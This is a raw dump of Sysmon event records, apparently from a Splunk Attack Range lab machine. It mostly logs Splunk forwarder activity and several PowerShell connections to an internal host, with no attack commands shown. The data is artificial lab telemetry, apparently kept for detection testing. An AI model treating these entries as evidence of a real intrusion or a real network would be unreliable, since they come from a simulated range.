AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62105-false10.0.1.12-8000- 23542300x800000000000000035128060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:01.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFF074EF62CD981430F0AA27756F4242,SHA256=6C3BBD12724D903BA3F823C4D1A62D4743472B6031F6FD92601394CB47F37575,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128063Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:02.698{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=806B72F1811D5C148F660BE669BD7972,SHA256=A270A0791C9C8433BBAA023EAE4EC8B991BA96E23A489CB4F83CF22AEAA3823E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128064Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:03.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D67EE7CFE8644B2726CF95A037D594,SHA256=9BE8C746FB7AF19C072D9F211E1D06CEB349A34616FBD8A2B72DA7302AD77BBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128066Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:04.715{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1001EF53F9EDE4570EB31AE2379EC44D,SHA256=F34F7D97E207E3ED47491C681332E08AD308864F5ECFD870D5124CAF96C00E6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128065Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:04.584{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B8D49A84D93657ADFDA968187EBED2A1,SHA256=FCE83C1D10962214677030AC81FEDA92850E8D6C100DB74F06C1950286353C20,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128068Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:05.745{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD6CBC72476D2E0C2A935255671F861,SHA256=DA02375CD0D8B50D6BA45F6BCB8BDBE0CCDCD8C3808337051C3136EF13074F97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:29.527{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62107-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:06.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF211FAA3DDEA8CF391152BE6C85B64,SHA256=A5288A6D9AE843D88342B0FCB7C6008CCEFAE1A64D407449D51196782C7A64AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:07.781{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18B2F9D6080C6E0D9239B8AF05EF0C16,SHA256=73A1D93E3EDD6D0217CB8EAEFDE51E086EE5DC7971542EF3652B405EA9DBCA3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:31.311{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62108-false10.0.1.12-8000- 354300x800000000000000035128074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:33.541{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62109-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:08.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E98977DBF6C7F8DB47C762F1824D841B,SHA256=9B75EF6292E5061A7A811B79CF219E3330871B90B9C19BC0128491EFDA7279CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:08.443{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7030A6992765D2D8B2A63E25AC957994,SHA256=96CF10E0E593E5DE4EA3770064B11384B76EE4185A144164B0EBB4FDC0944567,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:09.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AB66B9782531FFA15953DC7C1EFD681,SHA256=3A8C200274AE37433BEAFCDAD47E1CD53B013570820CCF95B81E24409A4E4040,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8336-613A-C896-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8336-613A-C896-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.925{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8336-613A-C896-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.910{B81B27B7-8336-613A-C896-03000000C801}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E39E5DDD222388B5646471FFA278D991,SHA256=A4F30A0B7617290722A7691E050CAC2ED30C538DFE8DD638CF4D2234E8D761B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.426{B81B27B7-8336-613A-C796-03000000C801}61286492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8336-613A-C796-03000000C801}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8336-613A-C796-03000000C801}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.226{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8336-613A-C796-03000000C801}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:10.211{B81B27B7-8336-613A-C796-03000000C801}6128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:11.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28A7ED5414337D6F9B66A424ABCDA973,SHA256=E7042DCFB39810B53F76F532A40C1BA5BB814AB9670151BE82ED07E4D05D8F6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:11.225{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F0CD373A6D6F28BE16AFE475D98FE10,SHA256=C2F9986C8731D5A4DF6F23397E4E8E267986692EA42090AE373172F1DF102C7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:11.225{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5565C9F7D434E431B2A7E4E702A779B,SHA256=135D8D9199B8818B69E1CF8747CEEBEA8E9076D25EC00A05D6591D6D119343BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:12.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EE39631812467CFBEB10C6F061F4739,SHA256=BECA06BD7F61CB992BF283959F393B6F80F1913F9FE3DC45D80AA0B587E5C551,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:13.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C3ADF9A8318C320F25560205D408A4,SHA256=57C61439F2D6B980FA7A547E4DB63758E752CAD878CCF7794EDC52022046D49F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:57:13.607{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 